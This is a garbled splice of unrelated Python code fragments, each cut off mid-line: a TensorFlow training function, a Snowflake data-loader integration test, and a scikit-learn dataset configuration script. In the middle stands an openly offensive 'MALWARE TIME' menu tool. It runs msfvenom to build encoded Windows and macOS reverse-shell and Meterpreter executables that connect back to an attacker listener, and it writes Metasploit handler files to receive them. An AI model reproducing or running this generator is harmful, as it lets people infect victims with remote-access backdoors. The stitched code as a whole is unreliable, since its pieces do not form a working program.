model_name=FLAGS.model_name,
training=is_training,
override_params=override_params,
model_dir=FLAGS.model_dir)
return logits
if params['use_bfloat16']:
with tf.contrib.tpu.bfloat16_scope():
logits = tf.cast(build_model(), tf.float32)
else:
logits = build_model()
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
# If necessary, in the model_fn, use params['batch_size'] instead the batch
# size flags (--train_batch_size or --eval_batch_size).
batch_size = params['batch_size'] # pylint: disable=unused-variable
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, FLAGS.num_label_classes)
cross_entropy = tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=FLAGS.label_smoothing)
# Add weight decay to the loss for non-batch-normalization variables.
loss = cross_entropy + FLAGS.weight_decay * tf.add_n(
[tf.nn.l2_loss(v) for v in tf.trainable_variables()
if 'batch_normalization' not in v.name])
global_step = tf.train.get_global_step()
if has_moving_average_decay:
ema = tf.train.ExponentialMovingAverage(
decay=FLAGS.moving_average_decay, num_updates=global_step)
ema_vars = utils.get_ema_vars()
host_call = None
restore_vars_dict = None
if is_training:
# Compute
#! /usr/bin/env python3
##MSVenom Basic Payloads
import os
import importlib
from importlib import util
spec = importlib.util.find_spec('.subserv', package='lib')
m = spec.loader.load_module()
customfolder = m.loc + "/aMALgamation/current/VenomCustom/"
if not os.path.exists(customfolder):
os.makedirs(customfolder)
## 32 bit MSFVenom MeterpreterShell
def venom():
os.system("clear")
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\t***MALWARE TIME!!!!!***\n\n" + m.bcolors.ENDC)
while (1):
print(m.bcolors.BLUE + "\t*******************************************************************" + m.bcolors.ENDC)
print(m.bcolors.BOLD + m.bcolors.GREEN + """
*******************************************************************
_ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( M | S | F | V | e | n | o | m ) ( M | e | n | u )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
""" + m.bcolors.ENDC)
print(
m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("\t(1)\tGenerate Windows 32bit payload")
print("\t(2)\tGenerate Windows 64bit payload")
print("\t(3)\tGenerate Mac 32bit Payload")
print("\t(4)\tGenerate Mac 64bit Payload")
print("\t(5)\tGenerate Custom Payload")
print(m.bcolors.ERROR + m.bcolors.BOLD + "\t****If you are using this section then you should know what you want. I will try to help, BUT you must not be a NOOB!!" + m.bcolors.ENDC)
print("\t(99)\tGo back to the Custom Malware Menu")
print(
m.bcolors.GREEN + m.bcolors.BOLD + "\tAll payloads and RC files will be put in:" + m.bcolors.ERROR + customfolder + m.bcolors.ENDC)
print(m.bcolors.BLUE + "\t*******************************************************************" + m.bcolors.ENDC)
options = input("\nW4@+ Ma1w@r3 R U W@^t1ng Brobi-Wan: ")
if options == "1":
gen_win32()
elif options == "2":
gen_win64()
elif options == "3":
gen_mac32()
elif options == "4":
gen_mac64()
elif options == "5":
custom()
elif options == "99":
os.system("clear")
break
else:
input("You must be a Pats Fan! Come on pick something... ")
def gen_win32():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "windows/shell/bind_tcp"
b = "windows/shell/reverse_tcp"
c = "windows/shell/reverse_tcp_dns"
d = "windows/shell/reverse_udp"
e = "windows/shell_bind_tcp"
f = "windows/shell_reverse_tcp"
a1 = "windows/meterpreter/bind_tcp"
b1 = "windows/meterpreter/reverse_http"
c1 = "windows/meterpreter/reverse_https"
d1 = "windows/meterpreter/reverse_tcp"
e1 = "windows/meterpreter/reverse_tcp_dns"
a2 = "windows/meterpreter_bind_tcp"
b2 = "windows/meterpreter_reverse_http"
c2 = "windows/meterpreter_reverse_https"
d2 = "windows/meterpreter_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(e) ---%s
(f) ---%s
(a1)---%s
(b1)---%s
(c1)---%s
(d1)---%s
(e1)---%s
(a2)---%s
(b2)---%s
(c2)---%s
(d2)---%s
""" %(a, b, c, d, e, f, a1, b1, c1, d1, e1, a2, b2, c2, d2))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or d2
if payload == 'a':
payload = a
elif payload == 'b':
payload = b
elif payload == 'c':
payload = c
elif payload == 'd':
payload = d
elif payload == 'e':
payload = e
elif payload == 'f':
payload = f
elif payload == 'a1':
payload = a1
elif payload == 'b1':
payload = b1
elif payload == 'c1':
payload = c1
elif payload == 'd1':
payload = d1
elif payload == 'e1':
payload = e1
elif payload == 'a2':
payload = a2
elif payload == 'b2':
payload = b2
elif payload == 'c2':
payload = c2
elif payload == 'd2':
payload = d2
elif payload in ('q', 'Q'):
return
else:
print(m.bcolors.ERROR + m.bcolors.BOLD + m.bcolors.UNDERLINE +"\t********Invalid payload***********" + m.bcolors.ENDC)
print("\tYour Payload is: %s" %(payload))
if (port == "null"):
port = input("\tWhat Port are you wanting to use?:")
if port == 'q':
return
elif port == 'Q':
return
else:
print("\tYour port is: " + port)
if (filename == "null"):
filename = input("\tWhat is the name of your file?:")
if filename == 'q':
return
elif filename == 'Q':
return
else:
print("\tFile name set to: " + filename)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tWe are generating the 32bit Meterpreter Payloads NOW!" + m.bcolors.ENDC)
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating 32bit MSFVenom Files Named:" + filename)
os.system(
"msfvenom -p " + payload + " LHOST=" + m.listener_ip + " LPORT=" + port + " --platform win -a x86 -e x86/shikata_ga_nai -f exe >" + customfolder + filename + ".exe")
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating MSF Resource File...")
msf_resource_file = open(customfolder + filename + ".rc", "w")
msf_resource_file.write("""use multi/handler
set payload %s
set LHOST %s
set LPORT %s
set ExitOnSession false
exploit -j
""" % (payload, m.listener_ip, port))
## 64 bit MSFVenom MeterpreterShell
def gen_win64():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "windows/x64/shell/bind_tcp"
b = "windows/x64/shell/reverse_tcp"
c = "windows/x64/shell_bind_tcp"
d = "windows/x64/shell_reverse_tcp"
a1 = "windows/x64/meterpreter/bind_tcp"
b1 = "windows/x64/meterpreter/reverse_http"
c1 = "windows/x64/meterpreter/reverse_https"
d1 = "windows/x64/meterpreter/reverse_tcp"
a2 = "windows/x64/meterpreter_bind_tcp"
b2 = "windows/x64/meterpreter_reverse_http"
c2 = "windows/x64/meterpreter_reverse_https"
d2 = "windows/x64/meterpreter_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(a1)---%s
(b1)---%s
(c1)---%s
(d1)---%s
(a2)---%s
(b2)---%s
(c2)---%s
(d2)---%s
""" % (a, b, c, d, a1, b1, c1, d1, a2, b2, c2, d2))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or d2
if payload == 'a':
payload = a
elif payload == 'b':
payload = b
elif payload == 'c':
payload = c
elif payload == 'd':
payload = d
elif payload == 'a1':
payload = a1
elif payload == 'b1':
payload = b1
elif payload == 'c1':
payload = c1
elif payload == 'd1':
payload = d1
elif payload == 'a2':
payload = a2
elif payload == 'b2':
payload = b2
elif payload == 'c2':
payload = c2
elif payload == 'd2':
payload = d2
elif payload in ('q', 'Q'):
return
else:
print(m.bcolors.ERROR + m.bcolors.BOLD + m.bcolors.UNDERLINE +"\t********Invalid payload***********" + m.bcolors.ENDC)
print("\tYour Payload is: %s" % (payload))
if (port == "null"):
port = input("\tWhat Port are you wanting to use?:")
if port == 'q':
return
elif port == 'Q':
return
else:
print("\tYour port is: " + port)
if (filename == "null"):
filename = input("\tWhat is the name of your file?:")
if filename in ('q', 'Q'):
return
else:
print("\tFile name set to: " + filename)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tWe are generating the 64bit Meterpreter Payloads NOW!" + m.bcolors.ENDC)
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating 64bit MSFVenom Files Named:" + filename)
os.system(
"msfvenom -p " + payload + " LHOST=" + m.listener_ip + " LPORT=" + port + " --platform win -a x64 -e x64/xor -i 3 -f exe >" + customfolder + filename +".exe")
print(m.bcolors.BLUE + "[*]" + m.bcolors.ENDC + " Generating MSF Resource File...")
msf_resource_file = open(customfolder + filename + ".rc", "w")
msf_resource_file.write("""use multi/handler
set payload %s
set LHOST %s
set LPORT %s
set ExitOnSession false
exploit -j
""" % (payload, m.listener_ip, port))
## 32 bit MAC MSFVenom MeterpreterShell
def gen_mac32():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "osx/x86/shell_bind_tcp"
b = "osx/x86/shell_reverse_tcp"
c = "osx/x86/vforkshell/bind_tcp"
d = "osx/x86/vforkshell/reverse_tcp"
e = "osx/x86/vforkshell_bind_tcp"
f = "osx/x86/vforkshell_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(e) ---%s
(f) ---%s
""" % (a, b, c, d, e, f))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or
# tests/integration/test_target_snowflake.py
import datetime
import gzip
import json
import tempfile
import unittest
import mock
import os
import botocore
import boto3
import itertools
import target_snowflake
from target_snowflake import RecordValidationException
from target_snowflake.db_sync import DbSync
from target_snowflake.upload_clients.s3_upload_client import S3UploadClient
from pyarrow.lib import ArrowTypeError
from snowflake.connector.errors import ProgrammingError
from snowflake.connector.errors import DatabaseError
try:
import tests.integration.utils as test_utils
except ImportError:
import utils as test_utils
METADATA_COLUMNS = [
'_SDC_EXTRACTED_AT',
'_SDC_BATCHED_AT',
'_SDC_DELETED_AT'
]
class TestIntegration(unittest.TestCase):
"""
Integration Tests
"""
maxDiff = None
def setUp(self):
self.config = test_utils.get_test_config()
snowflake = DbSync(self.config)
# Drop target schema
if self.config['default_target_schema']:
snowflake.query("DROP SCHEMA IF EXISTS {}".format(self.config['default_target_schema']))
# Set up S3 client
aws_access_key_id = self.config.get('aws_access_key_id')
aws_secret_access_key = self.config.get('aws_secret_access_key')
aws_session_token = self.config.get('aws_session_token')
aws_session = boto3.session.Session(
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_session_token=aws_session_token
)
self.s3_client = aws_session.client('s3',
region_name=self.config.get('s3_region_name'),
endpoint_url=self.config.get('s3_endpoint_url'))
def persist_lines(self, lines):
"""Loads singer messages into snowflake without table caching option"""
target_snowflake.persist_lines(self.config, lines)
def persist_lines_with_cache(self, lines):
"""Enables table caching option and loads singer messages into snowflake.
Table caching mechanism is creating and maintaining an extra table in snowflake about
the table structures. It's very similar to the INFORMATION_SCHEMA.COLUMNS system views
but querying INFORMATION_SCHEMA is slow especially when lot of taps running
in parallel.
Selecting from a real table instead of INFORMATION_SCHEMA and keeping it
in memory while the target-snowflake is running results better load performance.
"""
table_cache, file_format_type = target_snowflake.get_snowflake_statics(self.config)
target_snowflake.persist_lines(self.config, lines, table_cache, file_format_type)
def remove_metadata_columns_from_rows(self, rows):
"""Removes metadata columns from a list of rows"""
d_rows = []
for r in rows:
# Copy the original row to a new dict to keep the original dict
# and remove metadata columns
d_row = r.copy()
for md_c in METADATA_COLUMNS:
d_row.pop(md_c, None)
# Add new row without metadata columns to the new list
d_rows.append(d_row)
return d_rows
def assert_metadata_columns_exist(self, rows):
"""This is a helper assertion that checks if every row in a list has metadata columns"""
for r in rows:
for md_c in METADATA_COLUMNS:
self.assertTrue(md_c in r)
def assert_metadata_columns_not_exist(self, rows):
"""This is a helper assertion that checks metadata columns don't exist in any row"""
for r in rows:
for md_c in METADATA_COLUMNS:
self.assertFalse(md_c in r)
def assert_three_streams_are_into_snowflake(self, should_metadata_columns_exist=False,
should_hard_deleted_rows=False):
"""
This is a helper assertion that checks if every data from the message-with-three-streams.json
file is available in Snowflake tables correctly.
Useful to check different loading methods (unencrypted, Client-Side encryption, gzip, etc.)
without duplicating assertions
"""
snowflake = DbSync(self.config)
default_target_schema = self.config.get('default_target_schema', '')
schema_mapping = self.config.get('schema_mapping', {})
# Identify target schema name
target_schema = None
if default_target_schema is not None and default_target_schema.strip():
target_schema = default_target_schema
elif schema_mapping:
target_schema = "tap_mysql_test"
# Get loaded rows from tables
table_one = snowflake.query("SELECT * FROM {}.test_table_one ORDER BY c_pk".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.test_table_two ORDER BY c_pk".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.test_table_three ORDER BY c_pk".format(target_schema))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1'}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_one), expected_table_one)
# ----------------------------------------------------------------------
# Check rows in table_two
# ----------------------------------------------------------------------
expected_table_two = []
if not should_hard_deleted_rows:
expected_table_two = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_DATE': datetime.datetime(2019, 2, 1, 15, 12, 45)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_DATE': datetime.datetime(2019, 2, 10, 2, 0, 0)}
]
else:
expected_table_two = [
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_DATE': datetime.datetime(2019, 2, 10, 2, 0, 0)}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_two), expected_table_two)
# ----------------------------------------------------------------------
# Check rows in table_three
# ----------------------------------------------------------------------
expected_table_three = []
if not should_hard_deleted_rows:
expected_table_three = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_TIME': datetime.time(4, 0, 0)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_TIME': datetime.time(7, 15, 0)},
{'C_INT': 3, 'C_PK': 3, 'C_VARCHAR': '3', 'C_TIME': datetime.time(23, 0, 3)}
]
else:
expected_table_three = [
{'C_INT': 1, 'C_PK': 1, 'C_VARCHAR': '1', 'C_TIME': datetime.time(4, 0, 0)},
{'C_INT': 2, 'C_PK': 2, 'C_VARCHAR': '2', 'C_TIME': datetime.time(7, 15, 0)}
]
self.assertEqual(
self.remove_metadata_columns_from_rows(table_three), expected_table_three)
# ----------------------------------------------------------------------
# Check if metadata columns exist or not
# ----------------------------------------------------------------------
if should_metadata_columns_exist:
self.assert_metadata_columns_exist(table_one)
self.assert_metadata_columns_exist(table_two)
self.assert_metadata_columns_exist(table_three)
else:
self.assert_metadata_columns_not_exist(table_one)
self.assert_metadata_columns_not_exist(table_two)
self.assert_metadata_columns_not_exist(table_three)
def assert_logical_streams_are_in_snowflake(self, should_metadata_columns_exist=False):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.logical1_table1 ORDER BY CID".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.logical1_table2 ORDER BY CID".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.logical2_table1 ORDER BY CID".format(target_schema))
table_four = snowflake.query("SELECT CID, CTIMENTZ, CTIMETZ FROM {}.logical1_edgydata WHERE CID IN(1,2,3,4,5,6,8,9) ORDER BY CID".format(target_schema))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'CID': 1, 'CVARCHAR': "inserted row", 'CVARCHAR2': None},
{'CID': 2, 'CVARCHAR': 'inserted row', "CVARCHAR2": "inserted row"},
{'CID': 3, 'CVARCHAR': "inserted row", 'CVARCHAR2': "inserted row"},
{'CID': 4, 'CVARCHAR': "inserted row", 'CVARCHAR2': "inserted row"}
]
# ----------------------------------------------------------------------
# Check rows in table_two
# ----------------------------------------------------------------------
expected_table_two = [
{'CID': 1, 'CVARCHAR': "updated row"},
{'CID': 2, 'CVARCHAR': 'updated row'},
{'CID': 3, 'CVARCHAR': "updated row"},
{'CID': 5, 'CVARCHAR': "updated row"},
{'CID': 7, 'CVARCHAR': "updated row"},
{'CID': 8, 'CVARCHAR': 'updated row'},
{'CID': 9, 'CVARCHAR': "updated row"},
{'CID': 10, 'CVARCHAR': 'updated row'}
]
# ----------------------------------------------------------------------
# Check rows in table_three
# ----------------------------------------------------------------------
expected_table_three = [
{'CID': 1, 'CVARCHAR': "updated row"},
{'CID': 2, 'CVARCHAR': 'updated row'},
{'CID': 3, 'CVARCHAR': "updated row"},
]
# ----------------------------------------------------------------------
# Check rows in table_four
# ----------------------------------------------------------------------
expected_table_four = [
{'CID': 1, 'CTIMENTZ': None, 'CTIMETZ': None},
{'CID': 2, 'CTIMENTZ': datetime.time(23, 0, 15), 'CTIMETZ': datetime.time(23, 0, 15)},
{'CID': 3, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(12, 0, 15)},
{'CID': 4, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(9, 0, 15)},
{'CID': 5, 'CTIMENTZ': datetime.time(12, 0, 15), 'CTIMETZ': datetime.time(15, 0, 15)},
{'CID': 6, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(0, 0)},
{'CID': 8, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(1, 0)},
{'CID': 9, 'CTIMENTZ': datetime.time(0, 0), 'CTIMETZ': datetime.time(0, 0)}
]
if should_metadata_columns_exist:
self.assertEqual(self.remove_metadata_columns_from_rows(table_one), expected_table_one)
self.assertEqual(self.remove_metadata_columns_from_rows(table_two), expected_table_two)
self.assertEqual(self.remove_metadata_columns_from_rows(table_three), expected_table_three)
self.assertEqual(table_four, expected_table_four)
else:
self.assertEqual(table_one, expected_table_one)
self.assertEqual(table_two, expected_table_two)
self.assertEqual(table_three, expected_table_three)
self.assertEqual(table_four, expected_table_four)
def assert_logical_streams_are_in_snowflake_and_are_empty(self):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.logical1_table1 ORDER BY CID".format(target_schema))
table_two = snowflake.query("SELECT * FROM {}.logical1_table2 ORDER BY CID".format(target_schema))
table_three = snowflake.query("SELECT * FROM {}.logical2_table1 ORDER BY CID".format(target_schema))
table_four = snowflake.query("SELECT CID, CTIMENTZ, CTIMETZ FROM {}.logical1_edgydata WHERE CID IN(1,2,3,4,5,6,8,9) ORDER BY CID".format(target_schema))
self.assertEqual(table_one, [])
self.assertEqual(table_two, [])
self.assertEqual(table_three, [])
self.assertEqual(table_four, [])
def assert_binary_data_are_in_snowflake(self, table_name, should_metadata_columns_exist=False):
# Get loaded rows from tables
snowflake = DbSync(self.config)
target_schema = self.config.get('default_target_schema', '')
table_one = snowflake.query("SELECT * FROM {}.{} ORDER BY ID".format(target_schema, table_name))
# ----------------------------------------------------------------------
# Check rows in table_one
# ----------------------------------------------------------------------
expected_table_one = [
{'ID': b'pk2', 'DATA': b'data2', 'CREATED_AT': datetime.datetime(2019, 12, 17, 16, 2, 55)},
{'ID': b'pk4', 'DATA': b'data4', "CREATED_AT": datetime.datetime(2019, 12, 17, 16, 32, 22)},
]
if should_metadata_columns_exist:
self.assertEqual(self.remove_metadata_columns_from_rows(table_one), expected_table_one)
else:
self.assertEqual(table_one, expected_table_one)
#################################
# TESTS #
#################################
def test_invalid_json(self):
"""Receiving invalid JSONs should raise an exception"""
tap_lines = test_utils.get_test_tap_lines('invalid-json.json')
with self.assertRaises(json.decoder.JSONDecodeError):
self.persist_lines_with_cache(tap_lines)
def test_message_order(self):
"""RECORD message without a previously received SCHEMA message should raise an exception"""
tap_lines = test_utils.get_test_tap_lines('invalid-message-order.json')
with self.assertRaises(Exception):
self.persist_lines_with_cache(tap_lines)
def test_run_query(self):
"""Running SQLs"""
snowflake = DbSync(self.config)
# Running single SQL should return as array
self.assertEqual(snowflake.query("SELECT 1 col1, 2 col2"),
[{'COL1': 1, 'COL2': 2}])
# Running multiple SQLs should return the result of the last query
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2"]),
[{'COL1': 5, 'COL2': 6}])
# Running multiple SQLs should return an empty list if the last query returns zero records
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2 WHERE 1 = 2"]),
[])
# Running multiple SQLs should return the result of the last query even if a previous query returns zero records
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2 WHERE 1 =2 ",
"SELECT 3 col1, 4 col2",
"SELECT 5 col1, 6 col2"]),
[{'COL1': 5, 'COL2': 6}])
# Running multiple SQLs should return an empty list if every query returns zero records
self.assertEqual(snowflake.query(["SELECT 1 col1, 2 col2 WHERE 1 = 2 ",
"SELECT 3 col1, 4 col2 WHERE 1 = 2",
"SELECT 5 col1, 6 col2 WHERE 1 = 2"]),
[])
def test_loading_tables_with_no_encryption(self):
"""Loading multiple tables from the same input tap with various columns types"""
tap_lines = test_utils.get_test_tap_lines('messages-with-three-streams.json')
# Turning off client-side encryption and load
self.config['client_side_encryption_master_key'] = ''
self.persist_lines_with_cache(tap_lines)
self.assert_three_streams_are_into_snowflake()
def test_loading_tables_with_client_side_encryption(self):
"""Loading multiple tables from the same input tap with various columns types"""
tap_lines
holding the dataset files
filename = os.path.basename(str(filename))
# see the param_grid at the bottom of this file for examples
metadata_grid[filename] = {
'dataset': dataset,
'X': X,
'y': y,
'y_train': y_train,
'y_test': y_test,
'X_train': X_train,
'X_test': X_test,
'header': head,
'X_header': X_header,
'y_header': y_header,
'decoder': decode,
'scaler': scaler,
'estimator_scoring': value['estimator_scoring'],
'learning_curve_scoring': value['learning_curve_scoring'],
'plots': value['plots'] if 'plots' in value else [],
'best_estimator': value['best_estimator']
}
dataset_count += 1
return metadata_grid
def metadata_to_xy_trn_tst(param_grid, *filenames):
"""
handle datasets with separate train and test files (adult.data, adult.test)
Future iterations of the code will aim at the dividing the roles of files_to_metadata() and metadata_to_xy_trn_tst()
since the former function already transforms the data to xy_trn_tst
:param param_grid: Dictionary with dataset names (str) as keys corresponding to the name of directory that contains
the filename(s). and dictionaries of parameter settings to read and edit the corresponding dataset as values. The
param setting are: filename(s) (list) including the file extension, header (str): None if header is within dataset,
delimiter (str), y (list): name of y column(s), skip_columns (int), train_size (float), split_random_state (int),
and 'included_test_train' (bool): True if the provided files are test and train datasets.
:param filenames: name of file(s), at most two, that contains the dataset. If >1, Files must be a train and test
datasets respectively
:return X_train, X_test, y_train, y_test, X_header, y_header, decoder, scaler object, scoring metrics, types of
plots, and extra model_params of the dataset
"""
Data_abspath = os.path.join(ROOT_DIR, 'Data')
dataset_dirname = None
# walk the directories to find the data file
for root, dirs, files in os.walk(Data_abspath):
for file in files:
if file == filenames[0]:
# save the directory name that contains the data file
dataset_dirname = os.path.basename(root)
# find the value that stores the model parameters corresponding to the dataset at hand
model_params = globals()['{}_params'.format(dataset_dirname)]
# create a dictionary with a single entry to feed into files_to_metadata()
import_param = {dataset_dirname: param_grid[dataset_dirname]}
METADATA_S = files_to_metadata(import_param)
# handle train and test separate files
metadata = METADATA_S[filenames[0]]
header, X_header, y_header, scaler, estimator_scoring, learning_curve_scoring, plots, best_estimator = \
metadata['header'], metadata['X_header'], metadata['y_header'], metadata['scaler'], \
metadata['estimator_scoring'], metadata['learning_curve_scoring'], metadata['plots'], metadata['best_estimator']
# no separate train and test
if len(filenames) == 1:
metadata = METADATA_S[filenames[0]]
dataset = metadata['dataset']
X = metadata['X']
y = metadata['y']
y_train = metadata['y_train']
y_test = metadata['y_test']
X_train = metadata['X_train']
X_test = metadata['X_test']
decoder = metadata['decoder']
else:
# train dataset as np array
train_metadata = METADATA_S[filenames[0]]
# test dataset as np array
test_metadata = METADATA_S[filenames[1]]
X_train, X_test = train_metadata['X'], test_metadata['X']
y_train, y_test = train_metadata['y'], test_metadata['y']
# not used for modelling, used for debugging
# can be scaled to handle splits with different train and test sizes
X = np.concatenate((X_train, X_test), axis=0)
y = np.concatenate((y_train, y_test), axis=None)
# scaled and fitted on train data
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
dataset = np.append(X, y.reshape((-1, 1)), axis=1)
# decoder is 2d. can't use it as label for confusionMatrix
decoder = [train_metadata['decoder'], test_metadata['decoder']]
output = {
'dataset': dataset,
'X': X,
'y': y,
'y_train': y_train,
'y_test': y_test,
'X_train': X_train,
'X_test': X_test,
'header': header,
'X_header': X_header,
'y_header': y_header,
'decoder': decoder,
'scaler': scaler,
'estimator_scoring': estimator_scoring,
'learning_curve_scoring': learning_curve_scoring,
'model_params': model_params,
'dataset_dirname': dataset_dirname,
'plots': plots,
'best_estimator': best_estimator
}
return output
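The scaler handling in the separate train/test branch above (statistics fitted on the training split via `fit_transform`, then reused on the test split via `transform`) can be exercised on its own; the numbers below are illustrative:

```python
import numpy as np
from sklearn.preprocessing import StandardScaler

# Mirror the pattern above: fit_transform on the train split, transform-only
# on the test split, so test data is scaled with the *training* statistics.
X_train = np.array([[0.0], [2.0], [4.0]])
X_test = np.array([[2.0]])  # equals the training mean

scaler = StandardScaler()
X_train_scaled = scaler.fit_transform(X_train)
X_test_scaled = scaler.transform(X_test)

# A test point equal to the training mean is mapped to zero.
print(float(X_test_scaled[0, 0]))  # -> 0.0
```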
read_files_param_grid = {
'diabetic_retinopathy': {
'filenames': ['messidor_features.arff'],
'header': 'columns',
'delimiter': ',',
'y': ['class label'],
'skip_columns': [],
'skip_rows': [24],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.svm.SVC(C=1, kernel='poly', gamma='scale', coef0=30, random_state=0)
},
'credit_default': {
'filenames': ['default of credit card clients.xls'],
'header': None,
'delimiter': None,
'y': ['default payment next month'],
'skip_columns': ['ID'],
'skip_rows': [1],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [1],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.ensemble.AdaBoostClassifier(algorithm='SAMME', n_estimators=50, learning_rate=0.1,
random_state=0)
},
'breast_cancer': {
'filenames': ['breast-cancer-wisconsin.data'],
'header': 'columns',
'delimiter': ',',
'y': ['Class'],
'skip_columns': ['Sample code number'],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [4],
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.linear_model.LogisticRegression(fit_intercept=True, penalty='none', C=1.0,
random_state=0, max_iter=10000)
},
'german_credit': {
'filenames': ['german.data-numeric'],
'header': 'columns.data-numeric',
'delimiter': ' ',
'y': ['target'],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'split_random_state': 0,
'stratify': True,
'included_test_train': False,
'estimator_scoring': [accuracy_score, recall_score, average_precision_score, roc_auc_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': [2],
'plots': ['best_estimator_vs_parameters', 'learning_curve', 'ROC_curve', 'PR_curve'],
'best_estimator': sklearn.linear_model.LogisticRegression(fit_intercept=True, penalty='none', C=10,
random_state=0, solver='sag',
class_weight={0: 1., 1: 5.})
},
'adult': {
'filenames': ['adult.data', 'adult.test'], # start with the train file because train_standard_scaler is used
'header': 'columns',
'delimiter': ',',
'y': ['yearly salary'],
'skip_columns': [],
'skip_rows': [0, 1],
'train_size': None,
'split_random_state': 0,
'stratify': True,
'included_test_train': True,
'estimator_scoring': [accuracy_score, precision_score],
'learning_curve_scoring': [[log_loss]],
'positive_label': ['>50K', '>50K.'],
